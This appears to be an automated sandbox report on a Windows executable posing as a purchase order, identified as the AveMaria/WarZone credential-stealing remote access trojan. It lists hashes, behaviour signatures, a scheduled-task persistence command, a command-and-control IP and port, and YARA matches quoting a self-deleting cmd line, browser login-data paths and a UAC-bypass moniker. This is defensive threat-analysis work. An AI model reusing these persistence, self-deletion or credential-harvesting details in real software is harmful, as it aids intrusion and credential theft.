Play interactive tour

Edit tour

Windows Analysis Report ADJUSTED PO3917NOV.exe

Overview

General Information

Sample Name:	ADJUSTED PO3917NOV.exe
Analysis ID:	514608
MD5:	ec46f95f234b89325e198104d1887b1c
SHA1:	d0600cdb17f86f31eff130d029a87717fde2cc7a
SHA256:	01bbef21bea94b6ec60c739df3e40e887cf0ea1df7ba2f1678ce708ba10a6203
Tags:	exewarzonerat
Infos:
Most interesting Screenshot:

Detection

AveMaria UACMe

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected AntiVM3

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected UACMe UAC Bypass tool

Yara detected AveMaria stealer

Multi AV Scanner detection for dropped file

Tries to steal Mail credentials (via file / registry access)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

.NET source code contains potential unpacker

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses schtasks.exe or at.exe to add and modify task schedules

Tries to harvest and steal browser information (history, passwords, etc)

Increases the number of concurrent connection per server for Internet Explorer

Contains functionality to hide user accounts

Contains functionality to steal e-mail passwords

Contains functionality to steal Chrome passwords or cookies

C2 URLs / IPs found in malware configuration

Contains functionality to inject threads in other processes

Contains functionality to create new users

Antivirus or Machine Learning detection for unpacked file

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to enumerate running services

Contains functionality to dynamically determine API calls

Uses the system / local time for branch decision (may execute only at specific dates)

Contains long sleeps (>= 3 min)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Enables debug privileges

Installs a raw input device (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

ADJUSTED PO3917NOV.exe (PID: 5404 cmdline: "C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe" MD5: EC46F95F234B89325E198104D1887B1C)

schtasks.exe (PID: 3244 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QUQovKcaZRcNZ" /XML "C:\Users\user\AppData\Local\Temp\tmpD7D5.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

ADJUSTED PO3917NOV.exe (PID: 1328 cmdline: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe MD5: EC46F95F234B89325E198104D1887B1C)

cleanup

Malware Configuration

Threatname: AveMaria

{"C2 url": "185.222.57.253", "port": 4782}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000003.327703338.00000000015C4000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000003.327703338.00000000015C4000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000004.00000000.319379461.0000000000400000.00000040.00000001.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
00000004.00000000.319379461.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000000.319379461.0000000000400000.00000040.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000004.00000000.319379461.0000000000400000.00000040.00000001.sdmp	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
00000004.00000000.321459100.0000000000400000.00000040.00000001.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
00000004.00000000.321459100.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000000.321459100.0000000000400000.00000040.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000004.00000000.321459100.0000000000400000.00000040.00000001.sdmp	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
00000004.00000000.317402875.0000000000400000.00000040.00000001.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
00000004.00000000.317402875.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000000.317402875.0000000000400000.00000040.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000004.00000000.317402875.0000000000400000.00000040.00000001.sdmp	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
00000004.00000003.327531363.00000000015CA000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000003.327531363.00000000015CA000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000004.00000000.316730524.0000000000400000.00000040.00000001.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
00000004.00000000.316730524.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000000.316730524.0000000000400000.00000040.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000004.00000000.316730524.0000000000400000.00000040.00000001.sdmp	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
00000004.00000003.327615222.000000000159F000.00000004.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x730:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x3538:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x730:$c1: Elevation:Administrator!new: 0x3538:$c1: Elevation:Administrator!new:
00000004.00000003.327615222.000000000159F000.00000004.00000001.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000004.00000003.327638100.00000000015C4000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000003.327638100.00000000015C4000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000004.00000003.327579370.00000000015B1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000003.327579370.00000000015B1000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000004.00000000.319990653.000000000054F000.00000040.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xdf0:$c1: Elevation:Administrator!new:
00000004.00000000.319990653.000000000054F000.00000040.00000001.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000004.00000000.321513614.000000000054F000.00000040.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xdf0:$c1: Elevation:Administrator!new:
00000004.00000000.321513614.000000000054F000.00000040.00000001.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000004.00000003.327551592.000000000159F000.00000004.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x730:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x3538:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x730:$c1: Elevation:Administrator!new: 0x3538:$c1: Elevation:Administrator!new:
00000004.00000003.327551592.000000000159F000.00000004.00000001.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000004.00000002.554723844.000000000054F000.00000040.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xdf0:$c1: Elevation:Administrator!new:
00000004.00000002.554723844.000000000054F000.00000040.00000001.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000004.00000000.318229472.000000000054F000.00000040.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xdf0:$c1: Elevation:Administrator!new:
00000004.00000000.318229472.000000000054F000.00000040.00000001.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000000.00000002.327281323.00000000030A2000.00000004.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x8ae10:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x8ae10:$c1: Elevation:Administrator!new:
00000000.00000002.327281323.00000000030A2000.00000004.00000001.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000000.00000002.327281323.00000000030A2000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.327281323.00000000030A2000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000004.00000000.319952873.0000000000400000.00000040.00000001.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
00000004.00000000.319952873.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000000.319952873.0000000000400000.00000040.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000004.00000000.319952873.0000000000400000.00000040.00000001.sdmp	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
00000000.00000002.327014581.0000000002ED1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000004.00000000.318207568.0000000000400000.00000040.00000001.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
00000004.00000000.318207568.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000000.318207568.0000000000400000.00000040.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000004.00000000.318207568.0000000000400000.00000040.00000001.sdmp	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
00000004.00000003.327676957.00000000015CA000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000003.327676957.00000000015CA000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000004.00000000.319416601.000000000054F000.00000040.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xdf0:$c1: Elevation:Administrator!new:
00000004.00000000.319416601.000000000054F000.00000040.00000001.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
00000004.00000003.327479352.00000000015A5000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000003.327479352.00000000015A5000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000000.00000002.327512166.0000000003ED9000.00000004.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x1e0e20:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x1e0e20:$c1: Elevation:Administrator!new:
00000000.00000002.327512166.0000000003ED9000.00000004.00000001.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000000.00000002.327512166.0000000003ED9000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.327512166.0000000003ED9000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
Process Memory Space: ADJUSTED PO3917NOV.exe PID: 5404	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: ADJUSTED PO3917NOV.exe PID: 5404	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
Process Memory Space: ADJUSTED PO3917NOV.exe PID: 5404	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ADJUSTED PO3917NOV.exe PID: 1328	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
Process Memory Space: ADJUSTED PO3917NOV.exe PID: 1328	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 63 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.3.ADJUSTED PO3917NOV.exe.15a0220.2.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x2318:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
4.3.ADJUSTED PO3917NOV.exe.15a0220.2.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x2318:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x2318:$c1: Elevation:Administrator!new:
4.3.ADJUSTED PO3917NOV.exe.15a0220.2.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
4.3.ADJUSTED PO3917NOV.exe.15a0220.5.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0xb18:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
4.3.ADJUSTED PO3917NOV.exe.15a0220.5.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xb18:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xb18:$c1: Elevation:Administrator!new:
4.3.ADJUSTED PO3917NOV.exe.15a0220.5.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x191f0:$c1: Elevation:Administrator!new:
0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x144e8:$a1: \Opera Software\Opera Stable\Login Data 0x14810:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14158:$a3: \Google\Chrome\User Data\Default\Login Data
0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.raw.unpack	AveMaria_WarZone	unknown	unknown	0x16630:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1640c:$str2: MsgBox.exe 0x1669c:$str4: \System32\cmd.exe 0x162e0:$str6: Ave_Maria 0x15b78:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x14e78:$str8: SMTP Password 0x14158:$str11: \Google\Chrome\User Data\Default\Login Data 0x15b44:$str12: \sqlmap.dll 0x191f0:$str16: Elevation:Administrator!new 0x19310:$str17: /n:%temp%
4.3.ADJUSTED PO3917NOV.exe.15a0220.5.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x2318:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
4.3.ADJUSTED PO3917NOV.exe.15a0220.5.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x2318:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x2318:$c1: Elevation:Administrator!new:
4.3.ADJUSTED PO3917NOV.exe.15a0220.5.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0.2.ADJUSTED PO3917NOV.exe.312c090.2.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
0.2.ADJUSTED PO3917NOV.exe.312c090.2.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xd80:$c1: Elevation:Administrator!new:
0.2.ADJUSTED PO3917NOV.exe.312c090.2.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x191f0:$c1: Elevation:Administrator!new:
4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x144e8:$a1: \Opera Software\Opera Stable\Login Data 0x14810:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14158:$a3: \Google\Chrome\User Data\Default\Login Data
4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack	AveMaria_WarZone	unknown	unknown	0x16630:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1640c:$str2: MsgBox.exe 0x1669c:$str4: \System32\cmd.exe 0x162e0:$str6: Ave_Maria 0x15b78:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x14e78:$str8: SMTP Password 0x14158:$str11: \Google\Chrome\User Data\Default\Login Data 0x15b44:$str12: \sqlmap.dll 0x191f0:$str16: Elevation:Administrator!new 0x19310:$str17: /n:%temp%
0.2.ADJUSTED PO3917NOV.exe.3fccb60.6.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xed2c0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xed2c0:$c1: Elevation:Administrator!new:
0.2.ADJUSTED PO3917NOV.exe.3fccb60.6.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0.2.ADJUSTED PO3917NOV.exe.3fccb60.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ADJUSTED PO3917NOV.exe.3fccb60.6.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x191f0:$c1: Elevation:Administrator!new:
4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x144e8:$a1: \Opera Software\Opera Stable\Login Data 0x14810:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14158:$a3: \Google\Chrome\User Data\Default\Login Data
4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack	AveMaria_WarZone	unknown	unknown	0x16630:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1640c:$str2: MsgBox.exe 0x1669c:$str4: \System32\cmd.exe 0x162e0:$str6: Ave_Maria 0x15b78:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x14e78:$str8: SMTP Password 0x14158:$str11: \Google\Chrome\User Data\Default\Login Data 0x15b44:$str12: \sqlmap.dll 0x191f0:$str16: Elevation:Administrator!new 0x19310:$str17: /n:%temp%
4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x191f0:$c1: Elevation:Administrator!new:
4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x144e8:$a1: \Opera Software\Opera Stable\Login Data 0x14810:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14158:$a3: \Google\Chrome\User Data\Default\Login Data
4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack	AveMaria_WarZone	unknown	unknown	0x16630:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1640c:$str2: MsgBox.exe 0x1669c:$str4: \System32\cmd.exe 0x162e0:$str6: Ave_Maria 0x15b78:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x14e78:$str8: SMTP Password 0x14158:$str11: \Google\Chrome\User Data\Default\Login Data 0x15b44:$str12: \sqlmap.dll 0x191f0:$str16: Elevation:Administrator!new 0x19310:$str17: /n:%temp%
4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
